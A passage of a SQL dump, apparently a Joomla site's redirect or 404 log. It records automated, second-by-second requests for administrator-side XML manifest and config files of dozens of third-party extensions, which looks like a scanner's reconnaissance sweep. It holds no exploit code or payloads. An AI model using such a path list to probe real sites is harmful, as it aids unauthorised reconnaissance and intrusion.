00:00:00',301),(23795,'http://3s-technologies.com.tr/tr/administrator/components/com_formmaker/formmaker.xml',NULL,'','',1,0,'2020-01-03 12:45:11','0000-00-00 00:00:00',301),(23796,'http://3s-technologies.com.tr/tr/administrator/components/com_formmaker/config.xml',NULL,'','',1,0,'2020-01-03 12:45:12','0000-00-00 00:00:00',301),(23797,'http://3s-technologies.com.tr/tr/administrator/components/com_gmap/com_gmap.xml',NULL,'','',1,0,'2020-01-03 12:45:13','0000-00-00 00:00:00',301),(23798,'http://3s-technologies.com.tr/tr/administrator/components/com_gmap/_gmap.xml',NULL,'','',1,0,'2020-01-03 12:45:13','0000-00-00 00:00:00',301),(23799,'http://3s-technologies.com.tr/tr/administrator/components/com_gmap/access.xml',NULL,'','',1,0,'2020-01-03 12:45:14','0000-00-00 00:00:00',301),(23800,'http://3s-technologies.com.tr/tr/administrator/components/com_gmap/gmap.xml',NULL,'','',1,0,'2020-01-03 12:45:14','0000-00-00 00:00:00',301),(23801,'http://3s-technologies.com.tr/tr/administrator/components/com_gmap/config.xml',NULL,'','',1,0,'2020-01-03 12:45:15','0000-00-00 00:00:00',301),(23802,'http://3s-technologies.com.tr/tr/administrator/components/com_simplecalendar/com_simplecalendar.xml',NULL,'','',1,0,'2020-01-03 12:45:15','0000-00-00 00:00:00',301),(23803,'http://3s-technologies.com.tr/tr/administrator/components/com_simplecalendar/_simplecalendar.xml',NULL,'','',1,0,'2020-01-03 12:45:16','0000-00-00 00:00:00',301),(23804,'http://3s-technologies.com.tr/tr/administrator/components/com_simplecalendar/access.xml',NULL,'','',1,0,'2020-01-03 12:45:16','0000-00-00 00:00:00',301),(23805,'http://3s-technologies.com.tr/tr/administrator/components/com_simplecalendar/simplecalendar.xml',NULL,'','',1,0,'2020-01-03 12:45:17','0000-00-00 00:00:00',301),(23806,'http://3s-technologies.com.tr/tr/administrator/components/com_simplecalendar/config.xml',NULL,'','',1,0,'2020-01-03 12:45:17','0000-00-00 00:00:00',301),(23807,'http://3s-technologies.com.tr/tr/administrator/components/com_gallery_wd/com_gallery_wd.xml',NULL,'','',1,0,'2020-01-03 12:45:18','0000-00-00 00:00:00',301),(23808,'http://3s-technologies.com.tr/tr/administrator/components/com_gallery_wd/_gallery_wd.xml',NULL,'','',1,0,'2020-01-03 12:45:19','0000-00-00 00:00:00',301),(23809,'http://3s-technologies.com.tr/tr/administrator/components/com_gallery_wd/access.xml',NULL,'','',1,0,'2020-01-03 12:45:19','0000-00-00 00:00:00',301),(23810,'http://3s-technologies.com.tr/tr/administrator/components/com_gallery_wd/gallery_wd.xml',NULL,'','',1,0,'2020-01-03 12:45:20','0000-00-00 00:00:00',301),(23811,'http://3s-technologies.com.tr/tr/administrator/components/com_gallery_wd/config.xml',NULL,'','',1,0,'2020-01-03 12:45:20','0000-00-00 00:00:00',301),(23812,'http://3s-technologies.com.tr/tr/administrator/components/com_osproperty/com_osproperty.xml',NULL,'','',1,0,'2020-01-03 12:45:21','0000-00-00 00:00:00',301),(23813,'http://3s-technologies.com.tr/tr/administrator/components/com_osproperty/_osproperty.xml',NULL,'','',1,0,'2020-01-03 12:45:21','0000-00-00 00:00:00',301),(23814,'http://3s-technologies.com.tr/tr/administrator/components/com_osproperty/access.xml',NULL,'','',1,0,'2020-01-03 12:45:22','0000-00-00 00:00:00',301),(23815,'http://3s-technologies.com.tr/tr/administrator/components/com_osproperty/osproperty.xml',NULL,'','',1,0,'2020-01-03 12:45:22','0000-00-00 00:00:00',301),(23816,'http://3s-technologies.com.tr/tr/administrator/components/com_osproperty/config.xml',NULL,'','',1,0,'2020-01-03 12:45:23','0000-00-00 00:00:00',301),(23817,'http://3s-technologies.com.tr/tr/administrator/components/com_zhgooglemap/com_zhgooglemap.xml',NULL,'','',1,0,'2020-01-03 12:45:24','0000-00-00 00:00:00',301),(23818,'http://3s-technologies.com.tr/tr/administrator/components/com_zhgooglemap/_zhgooglemap.xml',NULL,'','',1,0,'2020-01-03 12:45:24','0000-00-00 00:00:00',301),(23819,'http://3s-technologies.com.tr/tr/administrator/components/com_zhgooglemap/access.xml',NULL,'','',1,0,'2020-01-03 12:45:25','0000-00-00 00:00:00',301),(23820,'http://3s-technologies.com.tr/tr/administrator/components/com_zhgooglemap/zhgooglemap.xml',NULL,'','',1,0,'2020-01-03 12:45:25','0000-00-00 00:00:00',301),(23821,'http://3s-technologies.com.tr/tr/administrator/components/com_zhgooglemap/config.xml',NULL,'','',1,0,'2020-01-03 12:45:26','0000-00-00 00:00:00',301),(23822,'http://3s-technologies.com.tr/tr/administrator/components/com_timetable/com_timetable.xml',NULL,'','',1,0,'2020-01-03 12:45:26','0000-00-00 00:00:00',301),(23823,'http://3s-technologies.com.tr/tr/administrator/components/com_timetable/_timetable.xml',NULL,'','',1,0,'2020-01-03 12:45:27','0000-00-00 00:00:00',301),(23824,'http://3s-technologies.com.tr/tr/administrator/components/com_timetable/access.xml',NULL,'','',1,0,'2020-01-03 12:45:27','0000-00-00 00:00:00',301),(23825,'http://3s-technologies.com.tr/tr/administrator/components/com_timetable/timetable.xml',NULL,'','',1,0,'2020-01-03 12:45:28','0000-00-00 00:00:00',301),(23826,'http://3s-technologies.com.tr/tr/administrator/components/com_timetable/config.xml',NULL,'','',1,0,'2020-01-03 12:45:29','0000-00-00 00:00:00',301),(23827,'http://3s-technologies.com.tr/tr/administrator/components/com_zhbaidumap/com_zhbaidumap.xml',NULL,'','',1,0,'2020-01-03 12:45:29','0000-00-00 00:00:00',301),(23828,'http://3s-technologies.com.tr/tr/administrator/components/com_zhbaidumap/_zhbaidumap.xml',NULL,'','',1,0,'2020-01-03 12:45:30','0000-00-00 00:00:00',301),(23829,'http://3s-technologies.com.tr/tr/administrator/components/com_zhbaidumap/access.xml',NULL,'','',1,0,'2020-01-03 12:45:31','0000-00-00 00:00:00',301),(23830,'http://3s-technologies.com.tr/tr/administrator/components/com_zhbaidumap/zhbaidumap.xml',NULL,'','',1,0,'2020-01-03 12:45:32','0000-00-00 00:00:00',301),(23831,'http://3s-technologies.com.tr/tr/administrator/components/com_zhbaidumap/config.xml',NULL,'','',1,0,'2020-01-03 12:45:32','0000-00-00 00:00:00',301),(23832,'http://3s-technologies.com.tr/tr/administrator/components/com_vmap/com_vmap.xml',NULL,'','',1,0,'2020-01-03 12:45:33','0000-00-00 00:00:00',301),(23833,'http://3s-technologies.com.tr/tr/administrator/components/com_vmap/_vmap.xml',NULL,'','',1,0,'2020-01-03 12:45:33','0000-00-00 00:00:00',301),(23834,'http://3s-technologies.com.tr/tr/administrator/components/com_vmap/access.xml',NULL,'','',1,0,'2020-01-03 12:45:34','0000-00-00 00:00:00',301),(23835,'http://3s-technologies.com.tr/tr/administrator/components/com_vmap/vmap.xml',NULL,'','',1,0,'2020-01-03 12:45:35','0000-00-00 00:00:00',301),(23836,'http://3s-technologies.com.tr/tr/administrator/components/com_vmap/config.xml',NULL,'','',1,0,'2020-01-03 12:45:35','0000-00-00 00:00:00',301),(23837,'http://3s-technologies.com.tr/tr/administrator/components/com_avreloaded/com_avreloaded.xml',NULL,'','',2,0,'2020-01-03 12:45:36','0000-00-00 00:00:00',301),(23838,'http://3s-technologies.com.tr/tr/administrator/components/com_avreloaded/_avreloaded.xml',NULL,'','',1,0,'2020-01-03 12:45:36','0000-00-00 00:00:00',301),(23839,'http://3s-technologies.com.tr/tr/administrator/components/com_avreloaded/access.xml',NULL,'','',1,0,'2020-01-03 12:45:37','0000-00-00 00:00:00',301),(23840,'http://3s-technologies.com.tr/tr/administrator/components/com_avreloaded/avreloaded.xml',NULL,'','',1,0,'2020-01-03 12:45:37','0000-00-00 00:00:00',301),(23841,'http://3s-technologies.com.tr/tr/administrator/components/com_avreloaded/config.xml',NULL,'','',1,0,'2020-01-03 12:45:38','0000-00-00 00:00:00',301),(23842,'http://3s-technologies.com.tr/tr/administrator/components/com_jssupportticket/com_jssupportticket.xml',NULL,'','',1,0,'2020-01-03 12:45:38','0000-00-00 00:00:00',301),(23843,'http://3s-technologies.com.tr/tr/administrator/components/com_jssupportticket/_jssupportticket.xml',NULL,'','',1,0,'2020-01-03 12:45:39','0000-00-00 00:00:00',301),(23844,'http://3s-technologies.com.tr/tr/administrator/components/com_jssupportticket/access.xml',NULL,'','',1,0,'2020-01-03 12:45:39','0000-00-00 00:00:00',301),(23845,'http://3s-technologies.com.tr/tr/administrator/components/com_jssupportticket/jssupportticket.xml',NULL,'','',1,0,'2020-01-03 12:45:40','0000-00-00 00:00:00',301),(23846,'http://3s-technologies.com.tr/tr/administrator/components/com_jssupportticket/config.xml',NULL,'','',1,0,'2020-01-03 12:45:40','0000-00-00 00:00:00',301),(23847,'http://3s-technologies.com.tr/tr/administrator/components/com_jquickcontact/com_jquickcontact.xml',NULL,'','',1,0,'2020-01-03 12:45:41','0000-00-00 00:00:00',301),(23848,'http://3s-technologies.com.tr/tr/administrator/components/com_jquickcontact/_jquickcontact.xml',NULL,'','',1,0,'2020-01-03 12:45:42','0000-00-00 00:00:00',301),(23849,'http://3s-technologies.com.tr/tr/administrator/components/com_jquickcontact/access.xml',NULL,'','',1,0,'2020-01-03 12:45:42','0000-00-00 00:00:00',301),(23850,'http://3s-technologies.com.tr/tr/administrator/components/com_jquickcontact/jquickcontact.xml',NULL,'','',1,0,'2020-01-03 12:45:43','0000-00-00 00:00:00',301),(23851,'http://3s-technologies.com.tr/tr/administrator/components/com_jquickcontact/config.xml',NULL,'','',1,0,'2020-01-03 12:45:44','0000-00-00 00:00:00',301),(23852,'http://3s-technologies.com.tr/tr/administrator/components/com_prayercenter/com_prayercenter.xml',NULL,'','',1,0,'2020-01-03 12:45:44','0000-00-00 00:00:00',301),(23853,'http://3s-technologies.com.tr/tr/administrator/components/com_prayercenter/_prayercenter.xml',NULL,'','',1,0,'2020-01-03 12:45:45','0000-00-00 00:00:00',301),(23854,'http://3s-technologies.com.tr/tr/administrator/components/com_prayercenter/access.xml',NULL,'','',1,0,'2020-01-03 12:45:45','0000-00-00 00:00:00',301),(23855,'http://3s-technologies.com.tr/tr/administrator/components/com_prayercenter/prayercenter.xml',NULL,'','',1,0,'2020-01-03 12:45:46','0000-00-00 00:00:00',301),(23856,'http://3s-technologies.com.tr/tr/administrator/components/com_prayercenter/config.xml',NULL,'','',1,0,'2020-01-03 12:45:46','0000-00-00 00:00:00',301),(23857,'http://3s-technologies.com.tr/tr/administrator/components/com_ccnewsletter/com_ccnewsletter.xml',NULL,'','',1,0,'2020-01-03 12:45:47','0000-00-00 00:00:00',301),(23858,'http://3s-technologies.com.tr/tr/administrator/components/com_ccnewsletter/_ccnewsletter.xml',NULL,'','',1,0,'2020-01-03 12:45:47','0000-00-00 00:00:00',301),(23859,'http://3s-technologies.com.tr/tr/administrator/components/com_ccnewsletter/access.xml',NULL,'','',1,0,'2020-01-03 12:45:48','0000-00-00 00:00:00',301),(23860,'http://3s-technologies.com.tr/tr/administrator/components/com_ccnewsletter/ccnewsletter.xml',NULL,'','',1,0,'2020-01-03 12:45:48','0000-00-00 00:00:00',301),(23861,'http://3s-technologies.com.tr/tr/administrator/components/com_ccnewsletter/config.xml',NULL,'','',1,0,'2020-01-03 12:45:49','0000-00-00 00:00:00',301),(23862,'http://3s-technologies.com.tr/tr/administrator/components/com_jsjobs/com_jsjobs.xml',NULL,'','',1,0,'2020-01-03 12:45:50','0000-00-00 00:00:00',301),(23863,'http://3s-technologies.com.tr/tr/administrator/components/com_jsjobs/_jsjobs.xml',NULL,'','',1,0,'2020-01-03 12:45:50','0000-00-00 00:00:00',301),(23864,'http://3s-technologies.com.tr/tr/administrator/components/com_jsjobs/access.xml',NULL,'','',1,0,'2020-01-03 12:45:50','0000-00-00 00:00:00',301),(23865,'http://3s-technologies.com.tr/tr/administrator/components/com_jsjobs/jsjobs.xml',NULL,'','',1,0,'2020-01-03 12:45:51','0000-00-00 00:00:00',301),(23866,'http://3s-technologies.com.tr/tr/administrator/components/com_jsjobs/config.xml',NULL,'','',1,0,'2020-01-03 12:45:52','0000-00-00 00:00:00',301),(23867,'http://3s-technologies.com.tr/tr/administrator/components/com_solidres/com_solidres.xml',NULL,'','',1,0,'2020-01-03 12:45:52','0000-00-00 00:00:00',301),(23868,'http://3s-technologies.com.tr/tr/administrator/components/com_solidres/_solidres.xml',NULL,'','',1,0,'2020-01-03 12:45:53','0000-00-00 00:00:00',301),(23869,'http://3s-technologies.com.tr/tr/administrator/components/com_solidres/access.xml',NULL,'','',1,0,'2020-01-03 12:45:53','0000-00-00 00:00:00',301),(23870,'http://3s-technologies.com.tr/tr/administrator/components/com_solidres/solidres.xml',NULL,'','',1,0,'2020-01-03 12:45:54','0000-00-00 00:00:00',301),(23871,'http://3s-technologies.com.tr/tr/administrator/components/com_solidres/config.xml',NULL,'','',1,0,'2020-01-03 12:45:54','0000-00-00 00:00:00',301),(23872,'http://3s-technologies.com.tr/tr/administrator/components/com_dtregister/com_dtregister.xml',NULL,'','',1,0,'2020-01-03 12:45:55','0000-00-00 00:00:00',301),(23873,'http://3s-technologies.com.tr/tr/administrator/components/com_dtregister/_dtregister.xml',NULL,'','',1,0,'2020-01-03 12:45:55','0000-00-00 00:00:00',301),(23874,'http://3s-technologies.com.tr/tr/administrator/components/com_dtregister/access.xml',NULL,'','',1,0,'2020-01-03 12:45:56','0000-00-00 00:00:00',301),(23875,'http://3s-technologies.com.tr/tr/administrator/components/com_dtregister/dtregister.xml',NULL,'','',1,0,'2020-01-03 12:45:56','0000-00-00 00:00:00',301),(23876,'http://3s-technologies.com.tr/tr/administrator/components/com_dtregister/config.xml',NULL,'','',1,0,'2020-01-03 12:45:57','0000-00-00 00:00:00',301),(23877,'http://3s-technologies.com.tr/tr/administrator/components/com_projectlog/com_projectlog.xml',NULL,'','',1,0,'2020-01-03 12:45:57','0000-00-00 00:00:00',301),(23878,'http://3s-technologies.com.tr/tr/administrator/components/com_projectlog/_projectlog.xml',NULL,'','',1,0,'2020-01-03 12:45:57','0000-00-00 00:00:00',301),(23879,'http://3s-technologies.com.tr/tr/administrator/components/com_projectlog/access.xml',NULL,'','',1,0,'2020-01-03 12:45:58','0000-00-00 00:00:00',301),(23880,'http://3s-technologies.com.tr/tr/administrator/components/com_projectlog/projectlog.xml',NULL,'','',1,0,'2020-01-03 12:45:59','0000-00-00 00:00:00',301),(23881,'http://3s-technologies.com.tr/tr/administrator/components/com_projectlog/config.xml',NULL,'','',1,0,'2020-01-03 12:45:59','0000-00-00 00:00:00',301),(23882,'http://3s-technologies.com.tr/tr/administrator/components/com_ariquiz/com_ariquiz.xml',NULL,'','',1,0,'2020-01-03 12:45:59','0000-00-00 00:00:00',301),(23883,'http://3s-technologies.com.tr/tr/administrator/components/com_ariquiz/_ariquiz.xml',NULL,'','',1,0,'2020-01-03 12:46:00','0000-00-00 00:00:00',301),(23884,'http://3s-technologies.com.tr/tr/administrator/components/com_ariquiz/access.xml',NULL,'','',1,0,'2020-01-03 12:46:00','0000-00-00 00:00:00',301),(23885,'http://3s-technologies.com.tr/tr/administrator/components/com_ariquiz/ariquiz.xml',NULL,'','',1,0,'2020-01-03 12:46:01','0000-00-00 00:00:00',301),(23886,'http://3s-technologies.com.tr/tr/administrator/components/com_ariquiz/config.xml',NULL,'','',1,0,'2020-01-03 12:46:01','0000-00-00 00:00:00',301),(23887,'http://3s-technologies.com.tr/tr/administrator/components/com_realpin/com_realpin.xml',NULL,'','',1,0,'2020-01-03 12:46:02','0000-00-00 00:00:00',301),(23888,'http://3s-technologies.com.tr/tr/administrator/components/com_realpin/_realpin.xml',NULL,'','',1,0,'2020-01-03 12:46:02','0000-00-00 00:00:00',301),(23889,'http://3s-technologies.com.tr/tr/administrator/components/com_realpin/access.xml',NULL,'','',1,0,'2020-01-03 12:46:03','0000-00-00 00:00:00',301),(23890,'http://3s-technologies.com.tr/tr/administrator/components/com_realpin/realpin.xml',NULL,'','',1,0,'2020-01-03 12:46:03','0000-00-00 00:00:00',301),(23891,'http://3s-technologies.com.tr/tr/administrator/components/com_realpin/config.xml',NULL,'','',1,0,'2020-01-03 12:46:04','0000-00-00 00:00:00',301),(23892,'http://3s-technologies.com.tr/tr/administrator/components/com_muscol/com_muscol.xml',NULL,'','',1,0,'2020-01-03 12:46:04','0000-00-00 00:00:00',301),(23893,'http://3s-technologies.com.tr/tr/administrator/components/com_muscol/_muscol.xml',NULL,'','',1,0,'2020-01-03 12:46:05','0000-00-00 00:00:00',301),(23894,'http://3s-technologies.com.tr/tr/administrator/components/com_muscol/access.xml',NULL,'','',1,0,'2020-01-03 12:46:05','0000-00-00 00:00:00',301),(23895,'http://3s-technologies.com.tr/tr/administrator/components/com_muscol/muscol.xml',NULL,'','',1,0,'2020-01-03 12:46:06','0000-00-00 00:00:00',301),(23896,'http://3s-technologies.com.tr/tr/administrator/components/com_muscol/config.xml',NULL,'','',1,0,'2020-01-03 12:46:06','0000-00-00 00:00:00',301),(23897,'http://3s-technologies.com.tr/tr/administrator/components/com_questions/com_questions.xml',NULL,'','',1,0,'2020-01-03 12:46:07','0000-00-00 00:00:00',301),(23898,'http://3s-technologies.com.tr/tr/administrator/components/com_questions/_questions.xml',NULL,'','',1,0,'2020-01-03 12:46:07','0000-00-00 00:00:00',301),(23899,'http://3s-technologies.com.tr/tr/administrator/components/com_questions/access.xml',NULL,'','',1,0,'2020-01-03 12:46:08','0000-00-00 00:00:00',301),(23900,'http://3s-technologies.com.tr/tr/administrator/components/com_questions/questions.xml',NULL,'','',1,0,'2020-01-03 12:46:09','0000-00-00 00:00:00',301),(23901,'http://3s-technologies.com.tr/tr/administrator/components/com_questions/config.xml',NULL,'','',1,0,'2020-01-03 12:46:09','0000-00-00 00:00:00',301),(23902,'http://3s-technologies.com.tr/tr/administrator/components/com_jefaqpro/com_jefaqpro.xml',NULL,'','',1,0,'2020-01-03 12:46:10','0000-00-00 00:00:00',301),(23903,'http://3s-technologies.com.tr/tr/administrator/components/com_jefaqpro/_jefaqpro.xml',NULL,'','',1,0,'2020-01-03 12:46:10','0000-00-00 00:00:00',301),(23904,'http://3s-technologies.com.tr/tr/administrator/components/com_jefaqpro/access.xml',NULL,'','',1,0,'2020-01-03 12:46:11','0000-00-00 00:00:00',301),(23905,'http://3s-technologies.com.tr/tr/administrator/components/com_jefaqpro/jefaqpro.xml',NULL,'','',1,0,'2020-01-03 12:46:11','0000-00-00 00:00:00',301),(23906,'http://3s-technologies.com.tr/tr/administrator/components/com_jefaqpro/config.xml',NULL,'','',1,0,'2020-01-03 12:46:12','0000-00-00 00:00:00',301),(23907,'http://3s-technologies.com.tr/tr/administrator/components/com_extroform/com_extroform.xml',NULL,'','',1,0,'2020-01-03 12:46:12','0000-00-00 00:00:00',301),(23908,'http://3s-technologies.com.tr/tr/administrator/components/com_extroform/_extroform.xml',NULL,'','',1,0,'2020-01-03 12:46:13','0000-00-00 00:00:00',301),(23909,'http://3s-technologies.com.tr/tr/administrator/components/com_extroform/access.xml',NULL,'','',1,0,'2020-01-03 12:46:13','0000-00-00 00:00:00',301),(23910,'http://3s-technologies.com.tr/tr/administrator/components/com_extroform/extroform.xml',NULL,'','',1,0,'2020-01-03 12:46:14','0000-00-00 00:00:00',301),(23911,'http://3s-technologies.com.tr/tr/administrator/components/com_extroform/config.xml',NULL,'','',1,0,'2020-01-03 12:46:14','0000-00-00 00:00:00',301),(23912,'http://3s-technologies.com.tr/tr/administrator/components/com_squadmanagement/com_squadmanagement.xml',NULL,'','',1,0,'2020-01-03 12:46:15','0000-00-00 00:00:00',301),(23913,'http://3s-technologies.com.tr/tr/administrator/components/com_squadmanagement/_squadmanagement.xml',NULL,'','',1,0,'2020-01-03 12:46:15','0000-00-00 00:00:00',301),(23914,'http://3s-technologies.com.tr/tr/administrator/components/com_squadmanagement/access.xml',NULL,'','',1,0,'2020-01-03 12:46:16','0000-00-00 00:00:00',301),(23915,'http://3s-technologies.com.tr/tr/administrator/components/com_squadmanagement/squadmanagement.xml',NULL,'','',1,0,'2020-01-03 12:46:16','0000-00-00 00:00:00',301),(23916,'http://3s-technologies.com.tr/tr/administrator/components/com_squadmanagement/config.xml',NULL,'','',1,0,'2020-01-03 12:46:17','0000-00-00 00:00:00',301),(23917,'http://3s-technologies.com.tr/tr/administrator/components/com_adagency/com_adagency.xml',NULL,'','',1,0,'2020-01-03 12:46:17','0000-00-00 00:00:00',301),(23918,'http://3s-technologies.com.tr/tr/administrator/components/com_adagency/_adagency.xml',NULL,'','',1,0,'2020-01-03 12:46:18','0000-00-00 00:00:00',301),(23919,'http://3s-technologies.com.tr/tr/administrator/components/com_adagency/access.xml',NULL,'','',1,0,'2020-01-03 12:46:18','0000-00-00 00:00:00',301),(23920,'http://3s-technologies.com.tr/tr/administrator/components/com_adagency/adagency.xml',NULL,'','',1,0,'2020-01-03 12:46:19','0000-00-00 00:00:00',301),(23921,'http://3s-technologies.com.tr/tr/administrator/components/com_adagency/config.xml',NULL,'','',1,0,'2020-01-03 12:46:19','0000-00-00 00:00:00',301),(23922,'http://3s-technologies.com.tr/tr/administrator/components/com_jbusinessdirectory/com_jbusinessdirectory.xml',NULL,'','',1,0,'2020-01-03 12:46:20','0000-00-00 00:00:00',301),(23923,'http://3s-technologies.com.tr/tr/administrator/components/com_jbusinessdirectory/_jbusinessdirectory.xml',NULL,'','',1,0,'2020-01-03 12:46:20','0000-00-00 00:00:00',301),(23924,'http://3s-technologies.com.tr/tr/administrator/components/com_jbusinessdirectory/access.xml',NULL,'','',1,0,'2020-01-03 12:46:21','0000-00-00 00:00:00',301),(23925,'http://3s-technologies.com.tr/tr/administrator/components/com_jbusinessdirectory/jbusinessdirectory.xml',NULL,'','',1,0,'2020-01-03 12:46:21','0000-00-00 00:00:00',301),(23926,'http://3s-technologies.com.tr/tr/administrator/components/com_jbusinessdirectory/config.xml',NULL,'','',1,0,'2020-01-03 12:46:22','0000-00-00 00:00:00',301),(23927,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumnumerology/com_saxumnumerology.xml',NULL,'','',1,0,'2020-01-03 12:46:23','0000-00-00 00:00:00',301),(23928,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumnumerology/_saxumnumerology.xml',NULL,'','',1,0,'2020-01-03 12:46:23','0000-00-00 00:00:00',301),(23929,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumnumerology/access.xml',NULL,'','',1,0,'2020-01-03 12:46:24','0000-00-00 00:00:00',301),(23930,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumnumerology/saxumnumerology.xml',NULL,'','',1,0,'2020-01-03 12:46:24','0000-00-00 00:00:00',301),(23931,'http://3s-technologies.com.tr/tr/administrator/components/com_saxumnumerology/config.xml',NULL,'','',1,0,'2020-01-03 12:46:25','0000-00-00 00:00:00',301),(23932,'http://3s-technologies.com.tr/tr/administrator/components/com_pofos/com_pofos.xml',NULL,'','',1,0,'2020-01-03 12:46:25','0000-00-00 00:00:00',301),(23933,'http://3s-technologies.com.tr/tr/administrator/components/com_pofos/_pofos.xml',NULL,'','',1,0,'2020-01-03 12:46:26','0000-00-00 00:00:00',301),(23934,'http://3s-technologies.com.tr/tr/administrator/components/com_pofos/access.xml',NULL,'','',1,0,'2020-01-03 12:46:27','0000-00-00 00:00:00',301),(23935,'http://3s-technologies.com.tr/tr/administrator/components/com_pofos/pofos.xml',NULL,'','',1,0,'2020-01-03 12:46:27','0000-00-00 00:00:00',301),(23936,'http://3s-technologies.com.tr/tr/administrator/components/com_pofos/config.xml',NULL,'','',1,0,'2020-01-03 12:46:28','0000-00-00 00:00:00',301),(23937,'http://3s-technologies.com.tr/tr/administrator/components/com_jomestate/com_jomestate.xml',NULL,'','',1,0,'2020-01-03 12:46:28','0000-00-00 00:00:00',301),(23938,'http://3s-technologies.com.tr/tr/administrator/components/com_jomestate/_jomestate.xml',NULL,'','',1,0,'2020-01-03 12:46:29','0000-00-00 00:00:00',301),(23939,'http://3s-technologies.com.tr/tr/administrator/components/com_jomestate/access.xml',NULL,'','',1,0,'2020-01-03 12:46:29','0000-00-00 00:00:00',301),(23940,'http://3s-technologies.com.tr/tr/administrator/components/com_jomestate/jomestate.xml',NULL,'','',1,0,'2020-01-03 12:46:30','0000-00-00 00:00:00',301),(23941,'http://3s-technologies.com.tr/tr/administrator/components/com_jomestate/config.xml',NULL,'','',1,0,'2020-01-03 12:46:31','0000-00-00 00:00:00',301),(23942,'http://3s-technologies.com.tr/tr/administrator/components/com_jgive/com_jgive.xml',NULL,'','',1,0,'2020-01-03 12:46:31','0000-00-00 00:00:00',301),(23943,'http://3s-technologies.com.tr/tr/administrator/components/com_jgive/_jgive.xml',NULL,'','',1,0,'2020-01-03 12:46:32','0000-00-00 00:00:00',301),(23944,'http://3s-technologies.com.tr/tr/administrator/components/com_jgive/access.xml',NULL,'','',1,0,'2020-01-03 12:46:32','0000-00-00 00:00:00',301),(23945,'http://3s-technologies.com.tr/tr/administrator/components/com_jgive/jgive.xml',NULL,'','',1,0,'2020-01-03 12:46:33','0000-00-00 00:00:00',301),(23946,'http://3s-technologies.com.tr/tr/administrator/components/com_jgive/config.xml',NULL,'','',1,0,'2020-01-03 12:46:33','0000-00-00 00:00:00',301),(23947,'http://3s-technologies.com.tr/tr/administrator/components/com_abook/com_abook.xml',NULL,'','',1,0,'2020-01-03 12:46:34','0000-00-00 00:00:00',301),(23948,'http://3s-technologies.com.tr/tr/administrator/components/com_abook/_abook.xml',NULL,'','',1,0,'2020-01-03 12:46:34','0000-00-00 00:00:00',301),(23949,'http://3s-technologies.com.tr/tr/administrator/components/com_abook/access.xml',NULL,'','',1,0,'2020-01-03 12:46:35','0000-00-00 00:00:00',301),(23950,'http://3s-technologies.com.tr/tr/administrator/components/com_abook/abook.xml',NULL,'','',1,0,'2020-01-03 12:46:35','0000-00-00 00:00:00',301),(23951,'http://3s-technologies.com.tr/tr/administrator/components/com_abook/config.xml',NULL,'','',1,0,'2020-01-03 12:46:36','0000-00-00 00:00:00',301),(23952,'http://3s-technologies.com.tr/tr/administrator/components/com_neorecruit/com_neorecruit.xml',NULL,'','',1,0,'2020-01-03 12:46:36','0000-00-00 00:00:00',301),(23953,'http://3s-technologies.com.tr/tr/administrator/components/com_neorecruit/_neorecruit.xml',NULL,'','',1,0,'2020-01-03 12:46:39','0000-00-00 00:00:00',301),(23954,'http://3s-technologies.com.tr/tr/administrator/components/com_neorecruit/access.xml',NULL,'','',1,0,'2020-01-03 12:46:40','0000-00-00 00:00:00',301),(23955,'http://3s-technologies.com.tr/tr/administrator/components/com_neorecruit/neorecruit.xml',NULL,'','',1,0,'2020-01-03 12:46:41','0000-00-00 00:00:00',301),(23956,'http://3s-technologies.com.tr/tr/administrator/components/com_neorecruit/config.xml',NULL,'','',1,0,'2020-01-03 12:46:41','0000-00-00 00:00:00',301),(23957,'http://3s-technologies.com.tr/tr/administrator/components/com_vaccount/com_vaccount.xml',NULL,'','',1,0,'2020-01-03 12:46:42','0000-00-00 00:00:00',301),(23958,'http://3s-technologies.com.tr/tr/administrator/components/com_vaccount/_vaccount.xml',NULL,'','',1,0,'2020-01-03 12:46:42','0000-00-00 00:00:00',301),(23959,'http://3s-technologies.com.tr/tr/administrator/components/com_vaccount/access.xml',NULL,'','',1,0,'2020-01-03 12:46:43','0000-00-00 00:00:00',301),(23960,'http://3s-technologies.com.tr/tr/administrator/components/com_vaccount/vaccount.xml',NULL,'','',1,0,'2020-01-03 12:46:44','0000-00-00 00:00:00',301),(23961,'http://3s-technologies.com.tr/tr/administrator/components/com_vaccount/config.xml',NULL,'','',1,0,'2020-01-03 12:46:44','0000-00-00 00:00:00',301),(23962,'http://3s-technologies.com.tr/tr/administrator/components/com_jhotelreservation/com_jhotelreservation.xml',NULL,'','',1,0,'2020-01-03 12:46:45','0000-00-00 00:00:00',301),(23963,'http://3s-technologies.com.tr/tr/administrator/components/com_jhotelreservation/_jhotelreservation.xml',NULL,'','',1,0,'2020-01-03 12:46:45','0000-00-00 00:00:00',301),(23964,'http://3s-technologies.com.tr/tr/administrator/components/com_jhotelreservation/access.xml',NULL,'','',1,0,'2020-01-03 12:46:46','0000-00-00 00:00:00',301),(23965,'http://3s-technologies.com.tr/tr/administrator/components/com_jhotelreservation/jhotelreservation.xml',NULL,'','',1,0,'2020-01-03 12:46:46','0000-00-00 00:00:00',301),(23966,'http://3s-technologies.com.tr/tr/administrator/components/com_jhotelreservation/config.xml',NULL,'','',1,0,'2020-01-03 12:46:47','0000-00-00 00:00:00',301),(23967,'http://3s-technologies.com.tr/tr/administrator/components/com_invitex/com_invitex.xml',NULL,'','',1,0,'2020-01-03 12:46:47','0000-00-00 00:00:00',301),(23968,'http://3s-technologies.com.tr/tr/administrator/components/com_invitex/_invitex.xml',NULL,'','',1,0,'2020-01-03 12:46:48','0000-00-00 00:00:00',301),(23969,'http://3s-technologies.com.tr/tr/administrator/components/com_invitex/access.xml',NULL,'','',1,0,'2020-01-03 12:46:49','0000-00-00 00:00:00',301),(23970,'http://3s-technologies.com.tr/tr/administrator/components/com_invitex/invitex.xml',NULL,'','',1,0,'2020-01-03 12:46:49','0000-00-00 00:00:00',301),(23971,'http://3s-technologies.com.tr/tr/administrator/components/com_invitex/config.xml',NULL,'','',1,0,'2020-01-03 12:46:50','0000-00-00 00:00:00',301),(23972,'http://3s-technologies.com.tr/tr/administrator/components/com_ekrishta/com_ekrishta.xml',NULL,'','',1,0,'2020-01-03 12:46:50','0000-00-00 00:00:00',301),(23973,'http://3s-technologies.com.tr/tr/administrator/components/com_ekrishta/_ekrishta.xml',NULL,'','',1,0,'2020-01-03 12:46:51','0000-00-00 00:00:00',301),(23974,'http://3s-technologies.com.tr/tr/administrator/components/com_ekrishta/access.xml',NULL,'','',1,0,'2020-01-03 